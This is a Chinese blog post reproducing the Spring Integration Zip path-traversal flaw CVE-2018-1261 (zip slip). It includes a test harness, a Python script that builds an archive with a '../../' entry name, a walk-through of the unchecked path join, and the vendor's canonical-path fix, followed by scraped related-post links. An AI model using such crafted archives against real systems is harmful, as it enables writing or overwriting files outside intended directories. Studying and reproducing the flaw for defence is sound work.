不敢说分析,还是太菜了,多学习。

文章来源: 猎户安全实验室

存在漏洞的源码下载地址:https://github.com/spring-projects/spring-integration-extensions/releases/tag/zip.v1.0.0.RELEASE

代码下载两眼相望了好久,第一次弄这些东西,踩了好久的坑,边踩边学习。

用的是IDEA来复现: 终端打开到zip的文件夹,然后./gradlew idea 。直接就能直接用IDEA打开了。

漏洞地址:org/springframework/integration/zip/transformer/UnZipTransformerTests.java

这里的都是官方例子。

仿造官方例子写个测试类。

	@Test

	public void unzipCve() throws IOException, InterruptedException {

		final Resource resource = this.resourceLoader.getResource("classpath:testzipdata/test1.zip");

		final InputStream upZipFile = resource.getInputStream();

		UnZipTransformer unZipTransformer = new UnZipTransformer();

		unZipTransformer.setWorkDirectory(new File("/Users/yangxiaodi/java/CVE-2018-1261/spring-integration-extensions-zip.v1.0.0.RELEASE/spring-integration-zip/src/test/resources/testzipdata/"));

		unZipTransformer.setZipResultType(ZipResultType.FILE);//设置类型(FILE, BYTE_ARRAY)

		unZipTransformer.afterPropertiesSet();

		Message<InputStream> message = MessageBuilder.withPayload(upZipFile).build();

		unZipTransformer.transform(message);//漏洞入口。

		System.out.println("over");

	}

}

  

这里的zip解压要用 到../../../z.txt格式的压缩文件,用python脚本生成一个。

import zipfile

if __name__ == "__main__":

    try:

        binary = b'ddddsss'

        zipFile = zipfile.ZipFile("test1.zip", "a", zipfile.ZIP_DEFLATED)

        info = zipfile.ZipInfo("test1.zip")

        zipFile.writestr("../../dddwwtest.txt", binary)

        zipFile.close()

    except IOError as e:

        raise e

  

东西都准备妥当了,开始分析漏洞吧。

漏洞入口:

unZipTransformer.transform(message);

接着调用org/springframework/integration/zip/transformer/AbstractZipTransformer.java 下的doTransform()函数。

	@Override

	protected Object doTransform(Message<?> message) throws Exception {

		Assert.notNull(message, "message must not be null");

		final Object payload = message.getPayload();

		Assert.notNull(payload, "payload must not be null");

		return doZipTransform(message);//往下调用doZipTransform函数

	}

  

在调用org/springframework/integration/zip/transformer/UnZipTransformer.java 下的doZipTransform() 函数。

漏洞就出现在doZipTransform()函数。具体代码位置:

				ZipUtil.iterate(inputStream, new ZipEntryCallback() {//漏洞没过滤的地方

					@Override

					public void process(InputStream zipEntryInputStream, ZipEntry zipEntry) throws IOException {

						final String zipEntryName = zipEntry.getName();

						final long zipEntryTime = zipEntry.getTime();

						final long zipEntryCompressedSize = zipEntry.getCompressedSize();

						final String type = zipEntry.isDirectory() ? "directory" : "file";

						if (logger.isInfoEnabled()) {

							logger.info(String.format("Unpacking Zip Entry - Name: '%s',Time: '%s', " +

									"Compressed Size: '%s', Type: '%s'",

									zipEntryName, zipEntryTime, zipEntryCompressedSize, type));

						}

						if (ZipResultType.FILE.equals(zipResultType)) {

							final File tempDir = new File(workDirectory, message.getHeaders().getId().toString());

							tempDir.mkdirs(); //NOSONAR false positive,创建文件夹

							final File destinationFile = new File(tempDir, zipEntryName);

							if (zipEntry.isDirectory()) {

								destinationFile.mkdirs(); //NOSONAR false positive

							}

							else {

								SpringZipUtils.copy(zipEntryInputStream, destinationFile);

								uncompressedData.put(zipEntryName, destinationFile);

							}

						}

						else if (ZipResultType.BYTE_ARRAY.equals(zipResultType)) {

							if (!zipEntry.isDirectory()) {

								byte[] data = IOUtils.toByteArray(zipEntryInputStream);

								uncompressedData.put(zipEntryName, data);

							}

						}

						else {

							throw new IllegalStateException("Unsupported zipResultType " + zipResultType);

						}

					}

  

调用ZipUtil.iterate()函数,然后利用回调函数ZipEntryCallback()去处理解压出来的内容。

这里的final String zipEntryName = zipEntry.getName();  //就是解压出来的文件内容,

在final File destinationFile = new File(tempDir, zipEntryName); //这里没任何过滤就进行文件路径和文件名的拼接。

然后下面两句代码把文件给复制过去。

SpringZipUtils.copy(zipEntryInputStream, destinationFile);
uncompressedData.put(zipEntryName, destinationFile);

这里有个坑,就是../../../z.txt 的文件,不能存在未创建的文件夹路径,例如:   ../../zzz/z.txt ,在zzz文件夹不存在的情况下,会报错。

这里来看下他们官方的漏洞修复,增加了一个路径检测函数。官方地址

					public File checkPath(final Message<?> message, final String zipEntryName) throws IOException {

						final File tempDir = new File(workDirectory, message.getHeaders().getId().toString());

						tempDir.mkdirs(); //NOSONAR false positive

						final File destinationFile = new File(tempDir, zipEntryName);

						/* If we see the relative traversal string of ".." we need to make sure

						 * that the outputdir + name doesn't leave the outputdir.

						 */

						if (!destinationFile.getCanonicalPath().startsWith(workDirectory.getCanonicalPath())) {

							throw new ZipException("The file " + zipEntryName +

									" is trying to leave the target output directory of " + workDirectory);

						}

						return destinationFile;

					}

  

主要看这句话:

if (!destinationFile.getCanonicalPath().startsWith(workDirectory.getCanonicalPath()))

如果destinationFile.getCanonicalPath() 也就是当前的全文件路径,例如: /etc/s/../passwd ,会变成/etc/passwd ,

全文件路径中 开头不包含workDirectory.getCanonicalPath() 的路径,就报错。 例如:/etc/s/  ,而workDirectory是定义的路径。

综上就是路径不能往前跳转。

这种路径检测方法还是学到了,本以为会过滤“..” 这样的字符串,直接对比两次的路径也是个好方法

Spring Integration Zip不安全解压(CVE-2018-1261)漏洞复现的更多相关文章

  1. ref:Spring Integration Zip 不安全解压(CVE-2018-1261)漏洞分析

    ref:https://mp.weixin.qq.com/s/SJPXdZWNKypvWmL-roIE0Q 0x00 漏洞概览 漏洞名称:Spring Integration Zip不安全解压 漏洞编 ...

  2. liunx之zip格式的解压命令

    zip -r myfile.zip ./* 将当前目录下的所有文件和文件夹全部压缩成myfile.zip文件,-r表示递归压缩子目录下所有文件. 2.unzip unzip -o -d /home/s ...

  3. 正确的 zip 压缩与解压代码

    网上流传的zip压缩与解压 的代码有非常大的问题 尽管使用了ant进行压缩与解压,可是任务的流程还是用的java.util.zip 的方式写的,我在使用的过程中遇到了压缩的文件夹结构有误,甚至出现不同 ...

  4. Android之zip文件加密解压及进度条的实现

    zip文件的解压能够使用java的zip库,可是没有实现对加密文件的解压功能,这里能够使用zip4j来实现.详细能够參看该文<Android下zip压缩文件加密解密的完美解决方式>.该文件 ...

  5. java zip 压缩与解压

    java zip 压缩与解压 import java.io.BufferedInputStream; import java.io.BufferedOutputStream; import java. ...

  6. 文件操作工具类: 文件/目录的创建、删除、移动、复制、zip压缩与解压.

    FileOperationUtils.java package com.xnl.utils; import java.io.BufferedInputStream; import java.io.Bu ...

  7. Linux tar.gz 、zip、rar 解压 压缩命令

    tar -c: 建立压缩档案 -x:解压 -t:查看内容 -r:向压缩归档文件末尾追加文件 -u:更新原压缩包中的文件 这五个是独立的命令,压缩解压都要用到其中一个,可以和别的命令连用但只能用其中一个 ...

  8. 「Python实用秘技01」复杂zip文件的解压

    本文完整示例代码及文件已上传至我的Github仓库https://github.com/CNFeffery/PythonPracticalSkills 这是我的新系列文章「Python实用秘技」的第1 ...

  9. zip压缩,解压

    //引用 System.IO.Compression.FileSystem.dll var basePath = AppDomain.CurrentDomain.BaseDirectory; Syst ...

随机推荐

  1. 学会谈判zz

    经常有人问我,为什么谈判到你手里就变得那么容易?你有什么诀窍?其实只要是谈判,涉及双方利益,就绝不会轻松.之所以能谈判成功,仔细想想秘诀无非是两个字:“双赢”.要想成功,就要双方都受益.如果你一开始就 ...

  2. Java 读取HDFS文件系统

    最近有个需求,计算用户画像. 系统大概有800W的用户量,算每个用户的一些数据. 数据量比较大,算用hive还是毫无压力的,但是写的oracle,在给出数据给前端,就比较难受了. 然后换了种解决方法: ...

  3. 2018.12.15 bzoj3998: [TJOI2015]弦论(后缀自动机)

    传送门 后缀自动机基础题. 求第kkk小的子串(有可能要求本质不同) 直接建出samsamsam,然后给每个状态赋值之后在上面贪心选最小的(过程可以类比主席树/平衡树的查询操作)即可. 代码: #in ...

  4. JSP错误

    1.<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncodin ...

  5. C++STL 预定义函数对象和函数适配器

    预定义函数对象和函数适配器 预定义函数对象基本概念:标准模板库STL提前定义了很多预定义函数对象,#include <functional> 必须包含. 1使用预定义函数对象: void ...

  6. SQL语句之奇形怪状的冷门函数

    lag() over() ) OVER(ORDER BY C.column) FROM Table C; 第一条记录已经无法再取前一条记录,所以LAG()函数返回空. SQL为意思如下. LAG(C. ...

  7. Nios II——定制自己的IP1之Nios接口类型

    信号自动识别的接口前缀 接口前缀 接口类型 asi Avalon-ST宿端口(输入) aso Avalon-ST源端口(输出) avm Avalon-MM主端口 avs Avalon-MM从端口 ax ...

  8. Verilog中的阻塞与非阻塞

    这篇文档值得阅读 按说阻塞与非阻塞是Verilog中最基本的东西,也是老生常谈.但是最近看到很多程序里用到阻塞语句竟然不是很明白,说到底是从来没有自己仔细分析过.当然一般情况程序中也是推荐用非阻塞的. ...

  9. 2.2.2synchronized同步代码块的使用

    当两个并发线程访问同一个对象object中的synchronized(this)同步代码块时,一段时间内只能有一个线程执行,另一个线程必须等待期执行完才能执行. package com.cky.bea ...

  10. 协程之gevent

    迭代器:     一个实现了__iter__方法和__next__方法的对象,就是迭代器. 生成器:     生成器是一类特殊的迭代器     简单来说:只要在def中有yield关键字的 就称为 生 ...